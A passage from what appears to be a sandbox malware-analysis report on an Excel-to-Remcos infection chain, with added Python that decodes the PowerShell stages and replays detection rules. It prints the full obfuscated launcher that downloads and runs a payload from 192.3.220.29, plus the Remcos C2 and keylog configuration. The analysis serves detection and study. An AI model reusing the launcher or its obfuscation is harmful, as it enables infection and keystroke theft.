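                raise ValueError(f"unsupported term: {term}")
            out.append(chr(int(m.group(1), 0)))   # int(..., 0) accepts both 124 and 0x7C
    return "".join(out)


def deobfuscate_stage2(cmd: str) -> str:
    """Return the script exactly as PowerShell would hand it to Invoke-Expression."""
    m = _WRAPPED.search(cmd)
    if not m:
        raise ValueError("no (('...').Replace(...) wrapper found")
    script = m.group(1).replace("'+'", "")            # layer 1: rejoin the split fragments
    for call in _REPLACE.finditer(cmd, m.end(1)):     # layers 2-4, in left-to-right order
        script = script.replace(ps_str(call.group(1)), ps_str(call.group(2)))
    return script


def resolve_invoker(cmd: str) -> str:
    """Name the command that '& ( ... )' calls; $VerbosePreference defaults to SilentlyContinue."""
    m = _INVOKER.search(cmd)
    if not m:
        return ""
    pref = "SilentlyContinue"
    return "".join(pref[int(i)] for i in m.group(1).split(",")) + m.group(2)


def extract_iocs(script: str) -> dict:
    """Indicators from the unwrapped script; arguments written backwards are reversed."""
    download = re.search(r"'(https?://[^']*)'", script).group(1).strip()
    entry = re.search(r"\[([\w.]+)\]\.GetMethod\('(\w+)'\)", script)
    args_src = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", script).group(1)
    args = [a.strip().strip("'") for a in args_src.split(",")]
    args = [a[::-1] if a.endswith("//:ptth") else a for a in args]
    return {
        "download_url": download,                          # where the reversed base64 body is fetched from
        "entry_point": f"{entry.group(1)}::{entry.group(2)}",
        "stage3_url": args[0],                             # first VAI argument, reversed back
        "host_process": args[4],                           # process name the loader is told to use
        "invoke_args": args,
    }


if __name__ == "__main__":
    script = deobfuscate_stage2(STAGE2_CMD)
    print("invoker:", resolve_invoker(STAGE2_CMD))
    print(script)
    print(extract_iocs(script))
```

The host-process argument `CasPol` matches the process the report later shows carrying Remcos (CasPol.exe writing `C:\ProgramData\remcos\logs.dat`), and the reversed stage-3 URL points at the same 192.3.220.29 host that serves the stage-1 `.tIF` download and appears in the Suricata alerts below.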

                    Data Obfuscation

                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb
2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline", ProcessId: 3320, ProcessName: csc.exe
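The outer `PoWersHeLl.exe` launcher in the ParentCommandLine above never contains `::FromBase64String` or `::UTF8` as a literal: each `::` is assembled at run time from `[cHAR]58+[CHaR]0X3A` and the quotes around the blob from `[chAr]34`, and the script that the base64 decodes to separates every token with a run of 34 spaces before it calls `add-type -memberDefinition` (the csc.exe compile recorded in this section) and urlmon's `URLDownloadToFile`. The Python below is an added example, not part of the Joe Sandbox report: it splices the char codes back into text, decodes the blob from the page, measures how much of the script is padding, and pulls the P/Invoke target, the download URL and the drop path. The base64 blob is the page's own; its space runs are written as repeats of the encoded three-space group `ICAg` so that the listing stays readable. Function names are the example's own.

```python
"""Decoder for the stage-1 PowerShell launcher recorded in the ParentCommandLine fields above."""
import base64
import re

# Constructed input: the argument string of the outer PoWersHeLl.exe process as recorded
# in the report, with only the surrounding quotes removed. The base64 blob is the page's;
# its padding runs are written as repeats of "ICAg" (three encoded spaces) for readability.
_PAD = "ICAg"
STAGE1_B64 = (
    "JDV0ZiAg" + _PAD * 10 + "ICA9" + _PAD * 11 + "IGFkZC10eXBl" + _PAD * 11
    + "IC1tZW1CZXJEZWZJbklUaW9O" + _PAD * 11 + "ICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwg" + _PAD * 11
    + "Q2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAg"
    + _PAD * 10 + "ICBUY2tWTGosc3RyaW5n" + _PAD * 11 + "IFZJVixzdHJpbmcg" + _PAD * 11
    + "RVhsblBKcnBOUWMsdWludCAg" + _PAD * 10 + "ICBiRWp6LEludFB0ciAg" + _PAD * 10
    + "ICB5WlZTc0RNZGRPKTsn" + _PAD * 11 + "IC1OYW1F" + _PAD * 11 + "ICJpQXl3bmki" + _PAD * 11
    + "IC1OQU1lU1BhQ2Ug" + _PAD * 11 + "SXJSeiAg" + _PAD * 10 + "ICAtUGFzc1RocnU7" + _PAD * 11
    + "ICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUv"
    + "c2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFc"
    + "c2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAg"
    + _PAD * 10 + "ICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI="
)
STAGE1_CMD = (
    "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; "
    "INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A"
    "+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'"
    + STAGE1_B64 + "'+[chaR]34+'))')))"
)

# 'lit'+[char]58+[char]0x3A+'lit': the operator is assembled at run time so that neither
# '::FromBase64String' nor '::UTF8' ever appears literally in the command line.
_CHAR_SPLICE = re.compile(r"'\s*\+\s*((?:\[char\]\s*(?:0x[0-9a-f]+|\d+)\s*\+\s*)+)'", re.I)


def splice_char_codes(expr: str) -> str:
    """Fold every [char]N chain that sits between two string literals back into text."""
    def join(m):
        codes = re.findall(r"\[char\]\s*(0x[0-9a-f]+|\d+)", m.group(1), re.I)
        return "".join(chr(int(c, 0)) for c in codes)   # int(..., 0) handles 58 and 0X3A alike
    return _CHAR_SPLICE.sub(join, expr)


def extract_base64(cmd: str) -> str:
    """Return the argument of FromBase64String once the '::' and '"' splicing is undone."""
    m = re.search(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', splice_char_codes(cmd), re.I)
    if not m:
        raise ValueError('no spliced FromBase64String("...") call found')
    return m.group(1)


def decode_script(b64: str):
    """Decode the blob; return (raw script, whitespace-collapsed script, fraction of spaces)."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-8")
    collapsed = re.sub(r"[ \t]{2,}", " ", raw)
    return raw, collapsed, raw.count(" ") / len(raw)


def launcher_iocs(collapsed: str) -> dict:
    """Pull the P/Invoke target and the URLDownloadToFile source URL and destination path."""
    dll = re.search(r'DllImport\("([^"]+)"', collapsed).group(1)
    func = re.search(r"extern\s+\w+\s+(\w+)\(", collapsed).group(1)
    call = re.search(r'::URLDownloadToFile\(\s*\d+\s*,\s*"([^"]+)"\s*,\s*"([^"]+)"', collapsed, re.I)
    return {"pinvoke": f"{dll}!{func}", "url": call.group(1), "drop_path": call.group(2)}


if __name__ == "__main__":
    raw, collapsed, ratio = decode_script(extract_base64(STAGE1_CMD))
    print(f"padding: {ratio:.0%} of the decoded script is spaces")
    print(collapsed)
    print(launcher_iocs(collapsed))
```

The decoded script downloads the `.tIF` from 192.3.220.29 straight into `%APPDATA%\...gre.vbS`, sleeps three seconds and then hands that path to `IEX`, which is why the report shows powershell.exe (PID 3976) both creating the `.vbS` and spawning wscript.exe on it. More than half of the decoded script is padding, so a detection that keys on the size or entropy of the blob is looking at the wrong feature; the `[char]`-spliced `::` and the `FromBase64String` call that only exists after splicing are the stable parts.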

                    Stealing of Sensitive Information

                    Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 800, TargetFilename: C:\ProgramData\remcos\logs.dat
                    Timestamp                        SID      Severity  Classtype                                      Source IP       Source Port  Destination IP  Destination Port  Protocol
                    2024-11-20T16:57:20.567470+0100  2024197  1         A Network Trojan was detected                  192.3.220.29    80           192.168.2.22    49164             TCP
                    2024-11-20T16:57:26.891141+0100  2024197  1         A Network Trojan was detected                  192.3.220.29    80           192.168.2.22    49166             TCP
                    2024-11-20T16:57:20.442035+0100  2024449  1         Attempted User Privilege Gain                  192.168.2.22    49164        192.3.220.29    80                TCP
                    2024-11-20T16:57:26.891127+0100  2024449  1         Attempted User Privilege Gain                  192.168.2.22    49166        192.3.220.29    80                TCP
                    2024-11-20T16:57:55.899830+0100  2024449  1         Attempted User Privilege Gain                  192.168.2.22    49173        192.3.220.29    80                TCP
                    2024-11-20T16:58:12.263546+0100  2020425  1         Exploit Kit Activity Detected                  192.3.220.29    80           192.168.2.22    49175             TCP
                    2024-11-20T16:58:29.669499+0100  2020425  1         Exploit Kit Activity Detected                  192.3.220.29    80           192.168.2.22    49178             TCP
                    2024-11-20T16:58:12.263546+0100  2020424  1         Exploit Kit Activity Detected                  192.3.220.29    80           192.168.2.22    49175             TCP
                    2024-11-20T16:58:29.669499+0100  2020424  1         Exploit Kit Activity Detected                  192.3.220.29    80           192.168.2.22    49178             TCP
                    2024-11-20T16:58:15.230868+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.22    49176        192.3.101.149   6946              TCP
                    2024-11-20T16:57:16.955138+0100  2057635  1         A Network Trojan was detected                  192.3.220.29    80           192.168.2.22    49175             TCP
                    2024-11-20T16:57:16.955138+0100  2057635  1         A Network Trojan was detected                  192.3.220.29    80           192.168.2.22    49178             TCP
                    2024-11-20T16:57:52.360798+0100  2049038  1         A Network Trojan was detected                  142.215.209.78  443          192.168.2.22    49168             TCP
                    2024-11-20T16:58:14.591521+0100  2049038  1         A Network Trojan was detected                  142.215.209.78  443          192.168.2.22    49174             TCP
                    2024-11-20T16:58:19.031413+0100  2803304  3         Unknown Traffic                                192.168.2.22    49177        178.237.33.50   80                TCP
                    2024-11-20T16:57:16.955138+0100  2858295  1         A Network Trojan was detected                  192.3.220.29    80           192.168.2.22    49178             TCP
                    2024-11-20T16:57:16.955138+0100  2858295  1         A Network Trojan was detected                  192.3.220.29    80           192.168.2.22    49175             TCP
                    2024-11-20T16:58:11.865687+0100  2858796  1         A Network Trojan was detected                  192.168.2.22    49175        192.3.220.29    80                TCP
                    2024-11-20T16:58:29.247487+0100  2858796  1         A Network Trojan was detected                  192.168.2.22    49178        192.3.220.29    80                TCP
                    2024-11-20T16:57:36.883221+0100  2858795  1         A Network Trojan was detected                  192.168.2.22    49167        192.3.220.29    80                TCP
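The Sigma hits, file events and Suricata alerts above describe one chain: Excel spawns mshta.exe, an obfuscated powershell.exe drops a `.vbS` into `AppData\Roaming` and runs it through wscript.exe, the same PowerShell compiles an Add-Type stub via csc.exe from `Temp`, and CasPol.exe ends up writing the Remcos keylog while a flow goes to port 6946, the port in the extracted configuration. The Python below is an added example, not the report's or Sigma's own code: it loads those observations as constructed event records (PIDs, images, paths and addresses are the ones the report lists; command lines are shortened and `ppid` is `None` where the excerpt names no parent), evaluates rules that generalize the matches here (any Office parent with any script-host child, any script dropped under `AppData`, any csc.exe compile from `Temp` under PowerShell, any `powershell` token in non-canonical casing), and reconstructs a PID's ancestry. Rule names are the example's own.

```python
"""Detection rules replayed over the process, file and network events in this report."""
import re

# Constructed event records built from the report sections above. Command lines are
# shortened; ppid is None where the excerpt does not record the parent.
EVENTS = [
    {"kind": "process", "pid": 3552, "ppid": None, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", "cmd": "/automation -Embedding"},
    {"kind": "process", "pid": 3844, "ppid": 3552, "image": r"C:\Windows\System32\mshta.exe", "cmd": "-Embedding"},
    {"kind": "process", "pid": 3976, "ppid": None, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn(...)"'},
    {"kind": "process", "pid": 3112, "ppid": 3976, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "-Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT"},
    {"kind": "process", "pid": 892, "ppid": 3976, "image": r"C:\Windows\System32\wscript.exe", "cmd": r'"C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"'},
    {"kind": "process", "pid": 3320, "ppid": 3976, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", "cmd": r'/noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"'},
    {"kind": "process", "pid": 800, "ppid": None, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe", "cmd": ""},
    {"kind": "file", "pid": 3976, "path": r"C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"},
    {"kind": "file", "pid": 3976, "path": r"C:\Users\user\AppData\Local\Temp\qgk1oeyy.wdn.ps1"},
    {"kind": "file", "pid": 800, "path": r"C:\ProgramData\remcos\logs.dat"},
    {"kind": "network", "pid": 3552, "dst": "198.244.140.41", "dport": 443},
    {"kind": "network", "pid": None, "dst": "192.3.101.149", "dport": 6946},   # process not named in the alert table
]
REMCOS_C2_PORT = 6946   # from the extracted configuration: banaya.duckdns.org:6946

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def case_anomaly(text: str) -> bool:
    """True if 'powershell' occurs in any casing other than lower, upper or 'PowerShell'."""
    for tok in re.findall(r"powershell", text, re.I):
        if tok not in ("powershell", "POWERSHELL", "PowerShell"):
            return True
    return False


def run_rules(events: list) -> list:
    """Return (rule, pid) pairs; each rule generalizes one of the matches in this report."""
    procs = {e["pid"]: e for e in events if e["kind"] == "process"}
    hits = []
    for e in events:
        if e["kind"] == "process":
            parent = procs.get(e["ppid"])
            child = basename(e["image"])
            if parent and basename(parent["image"]) in OFFICE_APPS and child in SCRIPT_HOSTS:
                hits.append(("office_spawns_script_host", e["pid"]))
            if case_anomaly(e["cmd"]):
                hits.append(("powershell_case_anomaly", e["pid"]))
            if child in {"wscript.exe", "cscript.exe", "mshta.exe"} and re.search(r"\\AppData\\", e["cmd"], re.I):
                hits.append(("script_host_runs_from_appdata", e["pid"]))
            if child == "csc.exe" and parent and basename(parent["image"]) == "powershell.exe" \
                    and re.search(r"\\Temp\\.*\.cmdline", e["cmd"], re.I):
                hits.append(("csc_compile_from_temp", e["pid"]))     # Add-Type -MemberDefinition at work
        elif e["kind"] == "file":
            if re.search(r"\\AppData\\.*\.(vbs|ps1|hta|js)$", e["path"], re.I):
                hits.append(("script_dropped_in_appdata", e["pid"]))
            if re.search(r"\\ProgramData\\remcos\\", e["path"], re.I):
                hits.append(("remcos_keylog_file", e["pid"]))
        elif e["kind"] == "network" and e["dport"] == REMCOS_C2_PORT:
            hits.append(("remcos_c2_port", e["pid"]))
    return hits


def ancestry(events: list, pid: int) -> list:
    """Image basenames from pid up to the last parent the events know about."""
    procs = {e["pid"]: e for e in events if e["kind"] == "process"}
    chain = []
    while pid in procs:
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


if __name__ == "__main__":
    for rule, pid in run_rules(EVENTS):
        print(f"{rule:32s} pid={pid} chain={' <- '.join(ancestry(EVENTS, pid)) if pid else '?'}")
```

Excel's own TLS connection to 198.244.140.41:443 fires nothing here on purpose: outbound 443 from an Office process is too common to alert on alone, and the report itself only flags it through the Sigma network-connection rule in combination with the rest of the chain.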


                    AV Detection

                    Source: pi-77159.xls | Avira: detected
                    Source: C:\Users\user\AppData\Local\Temp\~DFC4030D08E8153FBD.TMP | Avira: detection malicious, Label: TR/AVI.Agent.xoswb
                    Source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["banaya.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VCYBO3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                    Source: pi-77159.xls | ReversingLabs: Detection: 26%
                    Source: Yara match | File source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: pi-77159.xls | Joe Sandbox ML: detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0043293A CryptAcquireContextA, CryptGenRandom, CryptReleaseContext | 34_2_0043293A
                    Source: CasPol.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

                    Source: Yara match | File source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR

                    Privilege Escalation

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00406764 _wcslen, CoGetObject | 34_2_00406764

                    Phishing

                    Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswhichgivingbestopportunities[1].hta, type: DROPPED
                    Source: unknown | HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49168 version: TLS 1.0
                    Source: unknown | HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49174 version: TLS 1.0
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: unknown | HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49165 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49171 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49172 version: TLS 1.2
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.pdb | source: powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.pdbhP | source: powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.pdb | source: powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.pdbhP | source: powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,34_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,34_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,34_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0044D5E9 FindFirstFileExA,34_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,34_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00406AC2 FindFirstFileW,FindNextFileW,34_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,34_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,34_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,34_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,34_2_00406F06

                    Software Vulnerabilities

                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\mshta.exe
                    Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: global traffic | DNS query: name: provit.uk
                    Source: global traffic | DNS query: name: 1017.filemail.com
                    Source: global traffic | DNS query: name: banaya.duckdns.org
                    Source: global traffic | DNS query: name: geoplugin.net
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.220.29:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 192.3.220.29:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 192.3.220.29:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 178.237.33.50:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
